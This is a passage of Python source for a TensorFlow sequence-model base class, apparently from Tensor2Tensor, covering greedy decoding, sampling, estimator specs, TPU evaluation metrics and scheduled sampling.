"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
if not features:
features = {}
inputs_old = None
if "inputs" in features and len(features["inputs"].shape) < 4:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 2)
if not self.has_input:
# Prepare partial targets.
# In either features["inputs"] or features["targets"].
# We force the outputs to begin with these sequences.
partial_targets = features.get("inputs")
if partial_targets is None:
partial_targets = features["targets"]
features["partial_targets"] = tf.to_int64(partial_targets)
# Save the targets in a var and reassign it after the tf.while loop to avoid
# having targets being in a 'while' frame. This ensures targets when used
# in metric functions stays in the same frame as other vars.
targets_old = features.get("targets", None)
target_modality = self._problem_hparams.modality["targets"]
def infer_step(i, recent_output, recent_logits, unused_loss):
"""Inference step."""
if not tf.contrib.eager.in_eager_mode():
recent_output.set_shape([None, None, None, 1])
padded = tf.pad(recent_output, [[0, 0], [0, 1], [0, 0], [0, 0]])
features["targets"] = padded
# This is inefficient in that it generates samples at all timesteps,
# not just the last one, except if target_modality is pointwise.
features["decode_loop_step"] = i
samples, logits, losses = self.sample(features)
# Concatenate the already-generated recent_output with last timestep
# of the newly-generated samples.
if target_modality.top_is_pointwise:
cur_sample = samples[:, -1, :, :]
else:
cur_sample = samples[:, i, :, :]
samples = tf.transpose(recent_output, perm=[1, 0, 2, 3])
samples = inplace_ops.alias_inplace_update(samples, i,
tf.to_int64(cur_sample))
samples = tf.transpose(samples, perm=[1, 0, 2, 3])
if not tf.contrib.eager.in_eager_mode():
samples.set_shape([None, None, None, 1])
# Assuming we have one shard for logits.
recent_logits = tf.transpose(recent_logits, perm=[1, 0, 2, 3, 4])
recent_logits = inplace_ops.alias_inplace_update(
recent_logits, i, tf.squeeze(logits[:, -1:], axis=1))
logits = tf.transpose(recent_logits, perm=[1, 0, 2, 3, 4])
loss = sum([l for l in losses.values() if l is not None])
return i + 1, samples, logits, loss
# Create an initial output tensor. This will be passed
# to the infer_step, which adds one timestep at every iteration.
if "partial_targets" in features:
initial_output = tf.to_int64(features["partial_targets"])
while len(initial_output.get_shape().as_list()) < 4:
initial_output = tf.expand_dims(initial_output, 2)
batch_size = common_layers.shape_list(initial_output)[0]
else:
batch_size = common_layers.shape_list(features["inputs"])[0]
initial_output = tf.zeros((batch_size, 0, 1, 1), dtype=tf.int64)
# Hack: foldl complains when the output shape is less specified than the
# input shape, so we confuse it about the input shape.
initial_output = tf.slice(initial_output, [0, 0, 0, 0],
common_layers.shape_list(initial_output))
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
decode_length = 1
else:
if "partial_targets" in features:
prefix_length = common_layers.shape_list(features["partial_targets"])[1]
else:
prefix_length = common_layers.shape_list(features["inputs"])[1]
decode_length = prefix_length + decode_length
# Initial values of result, logits and loss.
result = tf.concat(
[initial_output,
tf.zeros([batch_size, decode_length, 1, 1], tf.int64)],
axis=1)
# tensor padded to [batch_size, decode_length, 1, 1, vocab_size]
logits = tf.zeros((batch_size, decode_length, 1, 1,
target_modality.top_dimensionality))
if not tf.contrib.eager.in_eager_mode():
logits.set_shape([None, None, None, None, None])
loss = 0.0
def while_exit_cond(i, result, logits, loss): # pylint: disable=unused-argument
"""Exit the loop either if reach decode_length or EOS."""
not_overflow = i < decode_length
if self._problem_hparams.stop_at_eos:
def fn_not_eos():
# Check if the last predicted element is a EOS
return tf.reduce_any(
tf.not_equal(
tf.squeeze(result[:, -1, :, :]), text_encoder.EOS_ID))
not_eos = tf.cond(
# We only check for early stopping if there is at least 1 element (
# otherwise not_eos will crash).
tf.not_equal(i, 0),
fn_not_eos,
lambda: True,
)
return tf.cond(
tf.equal(batch_size, 1),
# If batch_size == 1, we check EOS for early stopping.
lambda: tf.logical_and(not_overflow, not_eos),
# Else, just wait for max length
lambda: not_overflow)
return not_overflow
_, result, logits, loss = tf.while_loop(
while_exit_cond,
infer_step, [tf.constant(0), result, logits, loss],
shape_invariants=[
tf.TensorShape([]),
tf.TensorShape([batch_size, decode_length, 1, 1]),
tf.TensorShape([
batch_size, decode_length, 1, 1,
target_modality.top_dimensionality
]),
tf.TensorShape([]),
],
back_prop=False,
parallel_iterations=1)
if inputs_old is not None: # Restore to not confuse Estimator.
features["inputs"] = inputs_old
# Reassign targets back to the previous value.
if targets_old is not None:
features["targets"] = targets_old
losses = {"training": loss}
if "partial_targets" in features:
partial_target_length = common_layers.shape_list(
features["partial_targets"])[1]
result = tf.slice(result, [0, partial_target_length, 0, 0],
[-1, -1, -1, -1])
return {
"outputs": result,
"scores": None,
"logits": logits,
"losses": losses,
}
def _slow_greedy_infer(self, features, decode_length):
"""A slow greedy inference method.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
if not features:
features = {}
inputs_old = None
if "inputs" in features and len(features["inputs"].shape) < 4:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 2)
if not self.has_input:
# Prepare partial targets.
# In either features["inputs"] or features["targets"].
# We force the outputs to begin with these sequences.
partial_targets = features.get("inputs")
if partial_targets is None:
partial_targets = features["targets"]
features["partial_targets"] = tf.to_int64(partial_targets)
# Save the targets in a var and reassign it after the tf.while loop to avoid
# having targets being in a 'while' frame. This ensures targets when used
# in metric functions stays in the same frame as other vars.
targets_old = features.get("targets", None)
target_modality = self._problem_hparams.modality["targets"]
def infer_step(recent_output, recent_logits, unused_loss):
"""Inference step."""
if not tf.contrib.eager.in_eager_mode():
if self._target_modality_is_real:
dim = self._problem_hparams.modality["targets"].top_dimensionality
recent_output.set_shape([None, None, None, dim])
else:
recent_output.set_shape([None, None, None, 1])
padded = tf.pad(recent_output, [[0, 0], [0, 1], [0, 0], [0, 0]])
features["targets"] = padded
# This is inefficient in that it generates samples at all timesteps,
# not just the last one, except if target_modality is pointwise.
samples, logits, losses = self.sample(features)
# Concatenate the already-generated recent_output with last timestep
# of the newly-generated samples.
if target_modality.top_is_pointwise:
cur_sample = samples[:, -1, :, :]
else:
cur_sample = samples[:,
common_layers.shape_list(recent_output)[1], :, :]
if self._target_modality_is_real:
cur_sample = tf.expand_dims(cur_sample, axis=1)
samples = tf.concat([recent_output, cur_sample], axis=1)
else:
cur_sample = tf.to_int64(tf.expand_dims(cur_sample, axis=1))
samples = tf.concat([recent_output, cur_sample], axis=1)
if not tf.contrib.eager.in_eager_mode():
samples.set_shape([None, None, None, 1])
# Assuming we have one shard for logits.
logits = tf.concat([recent_logits, logits[:, -1:]], 1)
loss = sum([l for l in losses.values() if l is not None])
return samples, logits, loss
# Create an initial output tensor. This will be passed
# to the infer_step, which adds one timestep at every iteration.
if "partial_targets" in features:
initial_output = tf.to_int64(features["partial_targets"])
while len(initial_output.get_shape().as_list()) < 4:
initial_output = tf.expand_dims(initial_output, 2)
batch_size = common_layers.shape_list(initial_output)[0]
else:
batch_size = common_layers.shape_list(features["inputs"])[0]
if self._target_modality_is_real:
dim = self._problem_hparams.modality["targets"].top_dimensionality
initial_output = tf.zeros((batch_size, 0, 1, dim), dtype=tf.float32)
else:
initial_output = tf.zeros((batch_size, 0, 1, 1), dtype=tf.int64)
# Hack: foldl complains when the output shape is less specified than the
# input shape, so we confuse it about the input shape.
initial_output = tf.slice(initial_output, [0, 0, 0, 0],
common_layers.shape_list(initial_output))
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
decode_length = 1
else:
if "partial_targets" in features:
prefix_length = common_layers.shape_list(features["partial_targets"])[1]
else:
prefix_length = common_layers.shape_list(features["inputs"])[1]
decode_length = prefix_length + decode_length
# Initial values of result, logits and loss.
result = initial_output
if self._target_modality_is_real:
logits = tf.zeros((batch_size, 0, 1, target_modality.top_dimensionality))
logits_shape_inv = [None, None, None, None]
else:
# tensor of shape [batch_size, time, 1, 1, vocab_size]
logits = tf.zeros((batch_size, 0, 1, 1,
target_modality.top_dimensionality))
logits_shape_inv = [None, None, None, None, None]
if not tf.contrib.eager.in_eager_mode():
logits.set_shape(logits_shape_inv)
loss = 0.0
def while_exit_cond(result, logits, loss): # pylint: disable=unused-argument
"""Exit the loop either if reach decode_length or EOS."""
length = common_layers.shape_list(result)[1]
not_overflow = length < decode_length
if self._problem_hparams.stop_at_eos:
def fn_not_eos():
return tf.not_equal( # Check if the last predicted element is a EOS
tf.squeeze(result[:, -1, :, :]), text_encoder.EOS_ID)
not_eos = tf.cond(
# We only check for early stopping if there is at least 1 element (
# otherwise not_eos will crash).
tf.not_equal(length, 0),
fn_not_eos,
lambda: True,
)
return tf.cond(
tf.equal(batch_size, 1),
# If batch_size == 1, we check EOS for early stopping.
lambda: tf.logical_and(not_overflow, not_eos),
# Else, just wait for max length
lambda: not_overflow)
return not_overflow
result, logits, loss = tf.while_loop(
while_exit_cond,
infer_step, [result, logits, loss],
shape_invariants=[
tf.TensorShape([None, None, None, None]),
tf.TensorShape(logits_shape_inv),
tf.TensorShape([]),
],
back_prop=False,
parallel_iterations=1)
if inputs_old is not None: # Restore to not confuse Estimator.
features["inputs"] = inputs_old
# Reassign targets back to the previous value.
if targets_old is not None:
features["targets"] = targets_old
losses = {"training": loss}
if "partial_targets" in features:
partial_target_length = common_layers.shape_list(
features["partial_targets"])[1]
result = tf.slice(result, [0, partial_target_length, 0, 0],
[-1, -1, -1, -1])
return {
"outputs": result,
"scores": None,
"logits": logits,
"losses": losses,
}
def sample(self, features):
"""Run the model and extract samples.
Args:
features: an map of string to `Tensor`.
Returns:
samples: an integer `Tensor`.
logits: a list of `Tensor`s, one per datashard.
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
"""
logits, losses = self(features) # pylint: disable=not-callable
if self._target_modality_is_real:
return logits, logits, losses # Raw numbers returned from real modality.
if self.hparams.sampling_method == "argmax":
samples = tf.argmax(logits, axis=-1)
else:
assert self.hparams.sampling_method == "random"
def multinomial_squeeze(logits, temperature=1.0):
logits_shape = common_layers.shape_list(logits)
reshaped_logits = (
tf.reshape(logits, [-1, logits_shape[-1]]) / temperature)
choices = tf.multinomial(reshaped_logits, 1)
choices = tf.reshape(choices, logits_shape[:-1])
return choices
samples = multinomial_squeeze(logits, self.hparams.sampling_temp)
return samples, logits, losses
def _shard_features(self, features): # pylint: disable=missing-docstring
sharded_features = dict()
for k, v in sorted(six.iteritems(features)):
v = tf.convert_to_tensor(v)
v_shape = common_layers.shape_list(v)
if not v_shape:
v = tf.expand_dims(v, axis=-1)
v_shape = [1]
if v_shape == [1]:
v = tf.tile(v, tf.to_int32([self._num_datashards]))
sharded_features[k] = self._data_parallelism(
tf.identity, tf.split(v, self._num_datashards, 0))
return sharded_features
def _to_features_per_datashard(self, features):
datashard_features = []
assert len(features[list(features.keys())[0]]) == self._num_datashards
for d in range(self._num_datashards):
f = {k: v[d] for k, v in six.iteritems(features)}
datashard_features.append(f)
return datashard_features
def _to_single_features_dict(self, datashard_features):
assert len(datashard_features) == self._num_datashards
features = collections.defaultdict(list)
for feats in datashard_features:
for k, v in six.iteritems(feats):
features[k].append(v)
return features
@staticmethod
def get_train_hooks(model_name, hook_context):
model_cls = registry.model(model_name)
return model_cls.train_hooks(hook_context)
@staticmethod
def get_eval_hooks(model_name, hook_context):
model_cls = registry.model(model_name)
return model_cls.eval_hooks(hook_context)
@staticmethod
def make_estimator_model_fn(model_name,
hparams,
decode_hparams=None,
use_tpu=False):
model_cls = registry.model(model_name)
def wrapping_model_fn(features, labels, mode, params=None, config=None):
return model_cls.estimator_model_fn(
hparams,
features,
labels,
mode,
config=config,
params=params,
decode_hparams=decode_hparams,
use_tpu=use_tpu)
return wrapping_model_fn
@classmethod
def estimator_model_fn(cls,
hparams,
features,
labels,
mode,
config=None,
params=None,
decode_hparams=None,
use_tpu=False):
"""Model fn for Estimator.
Args:
hparams: HParams, model hyperparameters
features: dict<str name, Tensor feature>
labels: Tensor
mode: tf.estimator.ModeKeys
config: RunConfig, possibly with data_parallelism attribute
params: dict, may include batch_size, use_tpu
decode_hparams: HParams, used when mode == PREDICT.
use_tpu: A bool, whether to build the inference graph for TPU.
Returns:
TPUEstimatorSpec if use tpu else EstimatorSpec
"""
if mode == tf.estimator.ModeKeys.TRAIN:
_create_dummy_vars()
hparams = copy.deepcopy(hparams)
# Instantiate model
data_parallelism = None
if not use_tpu and config:
data_parallelism = config.data_parallelism
reuse = tf.get_variable_scope().reuse
model = cls(
hparams,
mode,
data_parallelism=data_parallelism,
decode_hparams=decode_hparams,
_reuse=reuse)
# PREDICT mode
if mode == tf.estimator.ModeKeys.PREDICT:
if use_tpu:
inputs = features["inputs"]
shape = inputs.get_shape().as_list()
if shape[0] is None:
shape[0] = decode_hparams.batch_size or hparams.batch_size
if shape[1] is None:
shape[1] = hparams.max_input_seq_length or hparams.max_length
inputs.set_shape(shape)
return model.estimator_spec_predict(features, use_tpu=use_tpu)
# TRAIN and EVAL modes
if hparams.eval_run_autoregressive and mode == tf.estimator.ModeKeys.EVAL:
logits, losses_dict = model.eval_autoregressive(features)
else:
logits, losses_dict = model(features) # pylint: disable=not-callable
# Set known shapes
if common_layers.is_xla_compiled():
if isinstance(logits, dict):
for k, v in sorted(six.iteritems(logits)):
if "scalar/" in k:
continue
shape = v.get_shape().as_list()
if shape[0] is None:
shape[0] = params["batch_size"]
if shape[1] is None:
shape[1] = hparams.max_length
v.set_shape(shape)
else:
shape = logits.get_shape().as_list()
if shape[0] is None:
shape[0] = params["batch_size"]
if shape[1] is None:
shape[1] = hparams.max_length
logits.set_shape(shape)
assert "training" in losses_dict
# Attack mode
if mode == "attack":
return logits
# Summarize losses
model._summarize_losses(losses_dict) # pylint: disable=protected-access
# Accumulate losses
loss = sum(losses_dict[key] for key in sorted(losses_dict.keys()))
# EVAL mode
if mode == tf.estimator.ModeKeys.EVAL:
return model.estimator_spec_eval(features, logits, labels, loss,
losses_dict)
# TRAIN mode
assert mode == tf.estimator.ModeKeys.TRAIN
num_async_replicas = (1 if (use_tpu or not config) else
config.t2t_device_info["num_async_replicas"])
return model.estimator_spec_train(
loss, num_async_replicas=num_async_replicas, use_tpu=use_tpu)
def initialize_from_ckpt(self, ckpt_dir):
model_dir = self._hparams.get("model_dir", None)
already_has_ckpt = (
model_dir and tf.train.latest_checkpoint(model_dir) is not None)
if already_has_ckpt:
return
# TODO(mitchellstern): Add support for partitioned variables?
reader = tf.contrib.framework.load_checkpoint(ckpt_dir)
variable_map = {}
for var in tf.contrib.framework.get_trainable_variables():
var_name = var.name.split(":")[0]
if reader.has_tensor(var_name):
log_info("Loading variable from checkpoint: %s", var_name)
variable_map[var_name] = var
else:
log_info(
"Cannot find variable in checkpoint, skipping: %s", var_name)
tf.train.init_from_checkpoint(ckpt_dir, variable_map)
def estimator_spec_train(self, loss, num_async_replicas=1, use_tpu=False):
"""Constructs `tf.estimator.EstimatorSpec` for TRAIN (training) mode."""
train_op = self.optimize(loss, num_async_replicas=num_async_replicas,
use_tpu=use_tpu)
if use_tpu:
if self._hparams.warm_start_from:
def scaffold_fn():
self.initialize_from_ckpt(self._hparams.warm_start_from)
return tf.train.Scaffold()
else:
scaffold_fn = None
# Note: important to call this before remove_summaries()
if self.hparams.tpu_enable_host_call:
host_call = create_host_call(self.hparams.model_dir)
else:
host_call = None
remove_summaries()
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.TRAIN,
loss=loss,
train_op=train_op,
host_call=host_call,
scaffold_fn=scaffold_fn)
else:
if self._hparams.warm_start_from:
self.initialize_from_ckpt(self._hparams.warm_start_from)
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.TRAIN, loss=loss, train_op=train_op)
def estimator_spec_eval(self, features, logits, labels, loss, losses_dict):
"""Constructs `tf.estimator.EstimatorSpec` for EVAL (evaluation) mode."""
del losses_dict
hparams = self.hparams
if not hasattr(hparams, "problem"):
raise NotImplementedError(_no_problem_err("estimator_spec_eval"))
problem = hparams.problem
if common_layers.is_xla_compiled():
remove_summaries()
if isinstance(logits, dict):
eval_metrics_fn = create_tpu_eval_metrics_fn(problem, hparams)
# For TPU, logits dict will be passed as keyword arguments to
# eval_metrics_fn. Here we add the labels to those arguments.
logits.update({"labels": labels})
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.EVAL,
eval_metrics=(eval_metrics_fn, logits),
loss=loss)
else:
eval_metrics_fn = create_tpu_eval_metrics_fn(problem, hparams)
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.EVAL,
eval_metrics=(eval_metrics_fn, [logits, labels]),
loss=loss)
else:
task_list = [problem]
if hasattr(problem, "task_list"):
task_list = problem.task_list
eval_metrics_fns = metrics.create_evaluation_metrics(task_list, hparams)
eval_metrics = {}
for metric_name, metric_fn in six.iteritems(eval_metrics_fns):
if isinstance(logits, dict):
# the key is located in the center of metric_name: "metrics-%s/%s/%s"
k = metric_name.split("/")[1]
if k in logits:
eval_metrics[metric_name] = metric_fn(logits[k], features,
features[k])
else:
# We do not make it an error because we sometimes run models that
# predict only parts of the targets defined by the Problem class.
# For example, an autoencoder or pure-video model can run on a gym
# problem even if another model is also predicting other things,
# like actions or rewards.
tf.logging.warning("No key %s in logits for evaluation." % k)
else:
eval_metrics[metric_name] = metric_fn(logits, features,
features["targets"])
if isinstance(logits, dict):
predictions = logits
else:
predictions = {"predictions": logits}
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.EVAL,
predictions=predictions,
eval_metric_ops=eval_metrics,
loss=loss)
def estimator_spec_predict(self, features, use_tpu=False):
"""Constructs `tf.estimator.EstimatorSpec` for PREDICT (inference) mode."""
decode_hparams = self._decode_hparams
infer_out = self.infer(
features,
beam_size=decode_hparams.beam_size,
top_beams=(decode_hparams.beam_size
if decode_hparams.return_beams else 1),
alpha=decode_hparams.alpha,
decode_length=decode_hparams.extra_length,
use_tpu=use_tpu)
if isinstance(infer_out, dict):
outputs = infer_out["outputs"]
scores = infer_out["scores"]
else:
outputs = infer_out
scores = None
inputs = features.get("inputs")
if inputs is None:
inputs = features["targets"]
predictions = {
"outputs": outputs,
"scores": scores,
"inputs": inputs,
"targets": features.get("infer_targets"),
}
# Pass through remaining features
for name, feature in features.items():
if name not in list(predictions.keys()) + ["infer_targets"]:
if not feature.shape.as_list():
# All features must have a batch dimension
batch_size = common_layers.shape_list(outputs)[0]
feature = tf.tile(tf.expand_dims(feature, 0), [batch_size])
predictions[name] = feature
_del_dict_non_tensors(predictions)
export_out = {"outputs": predictions["outputs"]}
if "scores" in predictions:
export_out["scores"] = predictions["scores"]
# Necessary to rejoin examples in the correct order with the Cloud ML Engine
# batch prediction API.
if "batch_prediction_key" in predictions:
export_out["batch_prediction_key"] = predictions["batch_prediction_key"]
remove_summaries()
export_outputs = {
tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.PredictOutput(export_out)
}
if use_tpu:
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs=export_outputs)
else:
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs=export_outputs)
def _normalize_body_output(self, body_out):
if isinstance(body_out, tuple):
output, losses = body_out
if not isinstance(losses, dict):
losses = {"extra": tf.reduce_mean(losses)}
else:
output = body_out
losses = {"extra": 0.0}
return output, losses
def _summarize_losses(self, losses_dict):
"""Adds `tf.summary`s to all terms in the losses dictionary."""
if common_layers.should_generate_summaries():
with tf.name_scope("losses"):
for loss_name, loss_val in sorted(losses_dict.items()):
tf.summary.scalar(loss_name, loss_val)
def _with_timing(fn, msg, silent=False):
def fn_with_timing(*args, **kwargs):
start_time = time.time()
res = fn(*args, **kwargs)
if not silent:
log_info("Doing %s took %.3f sec." % (msg, time.time() - start_time))
return res
return fn_with_timing
def _create_dummy_vars():
"""Dummy vars for restore to work when not using TPU codepath."""
var_names = set([v.name for v in tf.global_variables()])
if "losses_avg/problem_0/total_loss:0" in var_names:
return
with tf.variable_scope("losses_avg"):
with tf.variable_scope("problem_0"):
for var_name in ["total", "extra", "training"]:
tf.get_variable(
"%s_loss" % var_name, initializer=100.0, trainable=False)
with tf.variable_scope("train_stats"):
tf.get_variable("problem_0_steps", initializer=0, trainable=False)
# These metrics are implemented with py_funcs and therefore do no work with TPU
TPU_METRIC_BLACKLIST = set([
metrics.Metrics.APPROX_BLEU,
metrics.Metrics.ROUGE_2_F,
metrics.Metrics.ROUGE_L_F,
metrics.Metrics.IMAGE_SUMMARY,
])
def create_tpu_eval_metrics_fn(problem, model_hparams):
"""Create the metrics_fn that TPUEstimatorSpec expects."""
metric_fns = []
eval_metrics = problem.eval_metrics()
tm = _create_target_modality(problem.get_hparams(model_hparams).modality)
if isinstance(tm, dict):
for k, v in six.iteritems(tm):
weights_fn = v.targets_weights_fn
def make_metric_fn(metric_fn):
def wrapped_metric_fn(logits, labels, weights_fn=weights_fn):
num, den = metric_fn(logits, labels, weights_fn=weights_fn)
return tf.metrics.mean(num, den)
return wrapped_metric_fn
for metric in eval_metrics:
if metric in TPU_METRIC_BLACKLIST:
log_warn("Skipping eval metric %s in TPU_METRIC_BLACKLIST", metric)
continue
name = "%s/metrics-%s/%s" % (k, problem.name, metric)
metric_fns.append((name, make_metric_fn(metrics.METRICS_FNS[metric])))
else:
weights_fn = tm.targets_weights_fn
def make_metric_fn(metric_fn):
def wrapped_metric_fn(logits, labels):
num, den = metric_fn(logits, labels, weights_fn=weights_fn)
return tf.metrics.mean(num, den)
return wrapped_metric_fn
for metric in eval_metrics:
if metric in TPU_METRIC_BLACKLIST:
log_warn("Skipping eval metric %s in TPU_METRIC_BLACKLIST", metric)
continue
name = "metrics-%s/%s" % (problem.name, metric)
metric_fns.append((name, make_metric_fn(metrics.METRICS_FNS[metric])))
def all_metrics_fn(logits=None, labels=None, **kwargs):
"""Construct metrics dictionary."""
metrics_dict = {}
if logits is None:
logits = kwargs
for name, fn in metric_fns:
if isinstance(logits, dict) and isinstance(labels, dict):
for k, v in six.iteritems(logits):
metrics_dict["%s/%s" % (k, name)] = fn(v, labels[k])
elif isinstance(logits, dict):
tf.logging.warning("Logits is a dict, but labels is not; only "
"evaluating logits['targets'] against labels.")
metrics_dict["%s/%s" % ("targets", name)] = fn(logits["targets"],
labels)
else:
metrics_dict[name] = fn(logits, labels)
return metrics_dict
return all_metrics_fn
def remove_summaries():
"""Remove summaries from the default graph."""
g = tf.get_default_graph()
key = tf.GraphKeys.SUMMARIES
log_debug("Remove summaries %s" % str(g.get_collection(key)))
del g.get_collection_ref(key)[:]
assert not g.get_collection(key)
def create_host_call(model_dir):
"""Construct a host_call writing scalar summaries.
Args:
model_dir: String containing path to train
Returns:
(fn, args) Pair to be called by TPUEstimator as the host_call.
"""
graph = tf.get_default_graph()
summaries = graph.get_collection(tf.GraphKeys.SUMMARIES)
gs_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
summary_kwargs = collections.OrderedDict()
for t in summaries:
# TODO(aidangomez): enable ImageSummary support when we have a faster method
# see @shibow's comment in cl/202344570
if t.op.type not in ["ScalarSummary"]:
tf.logging.warn("Ignoring unsupported tf.Summary type %s" % t.op.type)
continue
name = t.op.name
tensor = t.op.inputs[1]
if t.op.type == "ScalarSummary":
assert tensor.shape.is_compatible_with([])
if tensor.dtype == tf.int64:
tensor = tf.to_int32(tensor)
summary_kwargs["ScalarSummary" + name] = tf.reshape(tensor, [1])
elif t.op.type == "ImageSummary":
# TODO(aidangomez): as we move to support more types, update
# common_layers.tpu_safe_image_summary
if tensor.dtype != tf.float32:
tf.logging.warn(
"Currently T2T on TPU only supports ImageSummary of "
"tf.float32-type Tensors. Skipping Tensor "
"%s with dtype %s..." % (tensor.name, tensor.dtype))
continue
# tensor = tf.to_float(tensor)
summary_kwargs["ImageSummary" + name] = tensor
# When no supported summaries are found, don't create host_call. Otherwise,
# TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
# it, eventually causing hang.
if not summary_kwargs:
return None
summary_kwargs["global_step"] = gs_t
log_info("summary_kwargs %s" % str(summary_kwargs))
def host_call_fn(**kwargs):
"""Training host call. Creates summaries for training metrics.
Args:
**kwargs: Dict of {str: Tensor} , with `Tensor` of shape `[batch]`. Must
contain key "global_step" with value of current global_step Tensor.
Returns:
List of summary ops to run on the CPU host.
"""
gs = tf.to_int64(kwargs.pop("global_step")[0])
with tf.contrib.summary.create_file_writer(model_dir).as_default():
with tf.contrib.summary.always_record_summaries():
# We need to use tf.contrib.summary in order to feed the `step`.
for name, value in sorted(six.iteritems(kwargs)):
if name.startswith("ScalarSummary"):
name = name[len("ScalarSummary"):]
tf.contrib.summary.scalar(
name, tf.reduce_mean(tf.to_float(value)), step=gs)
elif name.startswith("ImageSummary"):
name = name[len("ImageSummary"):]
tf.contrib.summary.image(name, value, step=gs)
return tf.contrib.summary.all_summary_ops()
return (host_call_fn, summary_kwargs)
def _del_dict_non_tensors(d):
for k in list(d.keys()):
if not isinstance(d[k], tf.Tensor):
del d[k]
class DummyVariableStore(object):
@contextlib.contextmanager
def as_default(self):
yield
def create_eager_var_store():
if tf.contrib.eager.in_eager_mode():
return variable_scope.EagerVariableStore()
else:
return DummyVariableStore()
def scheduled_sampling(hparams, problem_hparams, dp, sharded_logits, losses,
sharded_features, transformed_features, model):
"""Scheduled sampling."""
target_modality = problem_hparams.modality["targets"]
def sample(x):
"""Multinomial sampling from a n-dimensional tensor."""
vocab_size = target_modality.top_dimensionality
samples = tf.multinomial(tf.reshape(x, [-1, vocab_size]), 1)
reshaped_samples = tf.reshape(samples, common_layers.shape_list(x)[:-1])
return tf.to_int32(reshaped_samples)
def mix_gold_sampled(gold_targets, sampled_targets):
return tf.where(
tf.less(
tf.random_uniform(common_layers.shape_list(sampled_targets)),
hparams.scheduled_sampling_gold_mixin_prob), gold_targets,
sampled_targets)
def sampled_results():
"""Generate scheduled sampling results."""
sampled_targets = dp(sample, sharded_logits)
new_targets = dp(mix_gold_sampled, sharded_features["targets"],
sampled_targets)
new_features = transformed_features
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
with tf.variable_scope(target_modality.name):
new_features["targets"] = target_modality.targets_bottom_sharded(
new_targets, dp)
with tf.variable_scope("body"):
body_outputs, losses = model.model_fn_sharded(new_features)
if not isinstance(losses, dict): # If it's a single extra loss.
losses = {"extra": losses}
with tf.variable_scope(target_modality.name):
new_sharded_logits = target_modality.top_sharded(
body_outputs, sharded_features["targets"], dp)
if "training" not in losses:
training_loss = target_modality.loss_sharded(
sharded_logits, sharded_features["targets"], dp)
training_loss *= problem_hparams.loss_multiplier
losses["training"] = training_loss
return new_sharded_logits, losses
# Run the above conditionally.
prob = hparams.scheduled_sampling_prob
prob *= common_layers.inverse_exp_decay(
hparams.scheduled_sampling_warmup_steps, min_value=0.001)
sharded_logits, losses = tf.cond(
tf.less(tf.random_uniform([]), prob), sampled_results,
lambda: (sharded_logits, losses))
return sharded_logits, losses
def average_sharded_losses(sharded_losses):
"""Average losses across datashards.
Args:
sharded_losses: list<dict<str loss_name, Tensor loss>>. The loss
can be a single Tensor or a 2-tuple (numerator and denominator).
Returns:
losses: dict<str loss_name, Tensor avg_loss>
"""
losses = {}
for loss_name in sorted(sharded_losses[0]):
all_shards = [shard_losses[loss_name] for shard_losses in sharded_losses]
if isinstance(all_shards[0], tuple):
sharded_num, sharded_den = zip(*all_shards)
mean_loss = (
tf.add_n(sharded_num) / tf.maximum(
tf.cast(1.0, sharded_den[0].dtype), tf.add_n(sharded_den)))
else:
mean_loss = tf.reduce_mean(all_shards)
losses[loss_name] = mean_loss
return losses
def summarize_features(features, num_shards=1):
"""Generate summaries for features."""
if not common_layers.should_generate_summaries():
return
with tf.name_scope("input_stats"):
for (k, v) in sorted(six.iteritems(features)):
if isinstance(v, tf.Tensor) and v.get_shape().ndims > 1:
tf.summary.scalar("%s_batch" % k, tf.shape(v)[0] // num_shards)
tf.summary.scalar("%s_length" % k, tf.shape(v)[1])
nonpadding = tf.to_float(tf.not_equal(v, 0))
nonpadding_tokens = tf.reduce_sum(nonpadding)
tf.summary.scalar("%s_nonpadding_tokens" % k, nonpadding_tokens)
tf.summary.scalar("%s_nonpadding_fraction" % k,
tf.reduce_mean(nonpadding))
_already_logged = set()
def _eager_log(level, *args):
if tf.contrib.eager.in_eager_mode() and args in _already_logged:
return
_already_logged.add(args)
getattr(tf.logging, level)(*args)
def log_debug(*args):
_eager_log("debug", *args)
def log_info(*args):
_eager_log("info", *args)
def log_warn(*args):
_eager_log("warn", *args)
def _compose_custom_getters(getter_a, getter_b):
"""Compose two custom getters.
Example use:
tf.get_variable_scope().set_custom_getter(
compose_custom_getters(tf.get_variable_scope().custom_getter, new_getter))
This composes getters in the same way as creating a new variable scope with
the new_getter, but it does not actually create a new variable scope.
Args:
getter_a: a custom getter - generally from the existing variable scope.
getter_b: a custom getter
Returns:
a custom getter
"""
if not getter_a:
return getter_b
if not getter_b:
return getter_a
def getter_fn(getter, *args, **kwargs):
return getter_b(functools.partial(getter_a, getter), *args, **kwargs)
return getter_fn
def set_custom_getter_compose(custom_getter):
"""Set a custom getter in the current variable scope.
Do not overwrite the existing custom getter - rather compose with it.
Args:
custom_getter: a custom getter.
"""
tf.get_variable_scope().set_custom_getter(
